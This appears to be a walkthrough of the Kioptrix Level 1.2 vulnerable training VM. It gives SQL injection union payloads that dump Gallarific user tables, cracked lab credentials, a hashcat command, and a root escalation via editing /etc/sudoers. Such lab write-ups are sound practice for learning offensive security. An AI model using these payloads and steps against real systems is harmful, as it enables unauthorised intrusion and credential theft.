Kioptrix: Level 1.2 (#3) - (SQLi)

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself.

# localhost

# ::1 localhost127.0.0.1

Under Linux that would be /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to this.

Kioptrix: Level 1.2 (#3) VM Download

Walkthrough Video


//add ip of kioptrix level 3 vm to /etc/hosts file

//look at source of

//gallarific is present on the webserver
searchsploit Gallarific and 1=0 union select 1,concat(userid,0x3a,username,0x3a,password),3,4,5,6 from gallarific_users-- -
1:admin:n0t7t1k4 and 1=0 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name='dev_accounts'-- - and 1=0 union select 1,concat(id,0x3a,username,0x3a,password),3,4,5,6 from dev_accounts-- -


//use either online service , john, hashcat for breaking md5

#hashcat -m 0 -a0 file-containing-md5-hash /usr/share/wordlists/rockyou.txt


0d3eccfb887aabd50f243b3f155c0f85    md5 Mast3r   --> dreg
5badcaf789d3d1d09794d8f021f40f0e    md5 starwars   --> loneferret

//ssh to target machine with loneferret

# sudo ht
edit /etc/sudoers
loneferret ALL=(ALL) ALL

save and exit

# sudo /bin/sh
password: starwars

#root :D